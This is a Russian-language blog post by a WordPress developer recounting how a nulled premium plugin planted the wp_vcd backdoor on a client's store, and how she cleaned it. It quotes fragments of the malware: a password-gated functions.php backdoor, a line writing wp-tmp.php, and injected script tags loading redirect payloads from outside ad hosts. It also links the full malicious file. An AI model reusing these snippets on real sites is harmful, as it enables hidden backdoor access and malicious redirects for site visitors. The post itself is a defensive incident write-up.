Если ваш сайт взломан, вероятно, ваша вина

Если ваш сайт взломан, вероятно, это ваша вина

С самого начала моего знакомства с WordPress, я старалась соблюдать различные методы безопасности против взлома сайтов: установка защитных плагинов, изменение страницы входа в админку, систематическое обновление WordPress и тем. Но однажды, по своей неопытности, сама стала виновницей проникновения шпионского скрипта на один из сайтов, собственноручно открыла двери самому настоящему Backdoor.

Backdoor (переводится как «задняя дверь») относится к способу обхода аутентификации и дает злоумышленнику возможность удаленного доступа к сайту, оставаясь при этом незамеченным. Что позволяет злоумышленникам без проблем заходить в админку сайта, красть вашу информацию и устанавливать рекламные коды.

Бесплатный премиальный плагин — троянский конь.

Тут обязательно надо рассказать, с чего все началось и как обнаружилось, что с сайтом что-то не так. Некоторое время назад, я помогала в настройке интернет-магазина и потребовалось загрузить новые вариативные товары на сайт, но в бесплатной версии плагина WP All Import отсутствует возможность импортировать вариативные товары. Надо заметить, что PRO версия WP All Import стоит 99$, а к премиальной версии дополнительно приобретается аддон, который стоит почти столько же. И дабы облегчить процесс импорта товара, нужно было найти менее затратный способ это сделать, а с базой мы работать не умели. Сначала я обратила внимание на сайты складчин, но на нужные нам дополнения отсутствовало необходимое количество складчиков и сами заявки были созданы два-три года назад. И тут на глаза попадается сайт, на котором были размещены свежие PRO версии различных расширений и тем для WordPress. Конечно же я была наслышана о том, что бесплатные версии тем и плагинов использовать нежелательно, что в них может быть встроен вирус. Но сайт внушал доверие: выглядит он очень прилично, с хорошим оформлением, присутствуют комментарии посетителей. Я все-таки нашла и скачала нужный премиальный плагин и аддон.

После загрузки дополнений на компьютер, я открыла папки и начала изучать файлы, искала какой-либо намек на вирус, опыта у меня в этом деле не было. Начала я с аддона и ничего там не обнаружила. Т.к. файлов было много, у меня просто лопнуло терпение и я уже бегло проверяла файлы самого плагина, открывала выборочно папки, ничего необычного не обнаружила и остановила свои поиски. Затем, я переслала файлы администратору сайта и была очень рада, что смогла облегчить ему загрузку товара.

Дня через четыре я решила зайти проверить сайт, посмотреть как загрузились товары, кликнув на изображение товара, меня перекинуло на какой-то рекламный сайт. Сначала я решила, что заражен мой браузер, но все же зашла в консоль, сразу же открыла functions.php и увидела там этот код:

<?рhр if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_RЕQUEST['рassword'] == '6815b8892cf6767cbe71f75bf400ad')) { $div_code_namе="wp_vcd";

Как видно на скриншоте, этот вредоносный код расположился в самом начале functions.php.

backdoor в файле function.php

Как я очищала сайт от вирусов.

Оказалось, вирусный код был внедрен и в functions.php родительской темы, а также в другую установленную, но не активную тему. На всякий случай, я проверила все файлы темы, но больше ничего не обнаружила.

Так как опыта борьбы с подобным у меня не было, я просто удалила вирусные коды, но они появились вновь. Совсем не сразу я поняла, что «троянскими конями» являлись те самые бесплатные премиальные плагины. Когда же я вспомнила про них, то тут же удалила.

После безуспешных попыток, я решила поискать решение подобной ситуации в интернете. Стандартный совет — это восстановить сайт из резервного копирования, но у нас бэкап был недельной давности, после этого были внесены кое какие изменения. Также рекомендуют заменить файлы wordpress и темы на свежие. Этот метод я отложила на крайний случай и решила просто обновить WordPress. После обновления я еще раз удалила вирусные коды, также удалила неактивную тему и они больше не появились в functions.php. Конечно же меня это обрадовало, но все-таки я решила подробнее изучить тот код и по этому отрывку стало понятно где искать остальные файлы.

extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

На хостинге тут же прошла по адресу wp-includes/ и обнаружила там три странных файла wp-tmp.php, wp-vcd .php, wp-feed.php.

странные файлы в wordpress

Чтобы убедиться, что эти файлы можно удалить, я скачала свежую папку с WordPress и сравнила оригинальный wp-includes с тем, что у меня на сайте. После этого я на всякий случай сохранила их к себе на компьютер и удалила с хостинга. Вот такой вирусный скрипт использовался в одном из файлов, благодаря ему меня перекинуло с нашего сайта на другой:

<script tуpe="text/jаvаscript" src="//go.onсlаsrv.соm/apu.php?zoneid=1412000"></sсript>
<script asуnс="asуnc" typу="text/javascript" src="//go.mоbislа.соm/noticе.php?p=1412002&interactive=1&pushup=1"></sсript>

Проверив заново все файлы, я убедилась, что сайт чист, теперь нужно обязательно сменить пароли и навсегда забыть про халявные премиальные плагины!

После всех событий я еще раз попробовала отыскать вирусы в папке скаченного мною плагина. На этот раз я его обнаружила, он находился в папке helpers, в файле class.plugin-modules.php, его содержимое можно посмотреть по этой ссылке —
pastebin.com/ecafwZbX.

Теперь всем советую изучить все файлы своего сайта, не забывать их периодически перепроверять и делать бэкап, ведь вирусы могут проникнуть не только с помощью бесплатных плагинов и тем.

СтраUz
Читайте также
Привет! Я Натали Мамбетова.

Занимаюсь разработкой сайтов, блогов, интернет-магазинов, лендингов на WordPress. Оказываю платные помощь и консультации. Являюсь сертифицированным партнером TemplateMonster по CMS системе WordPress, имею сертификат этой компании подтверждающий мои навыки в работе с данной системой.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

© СтраUz 2018. Все права защищены. Копирование разрешено только с указанием гиперссылки на источник.
Сделано с ❤
Заказать сайт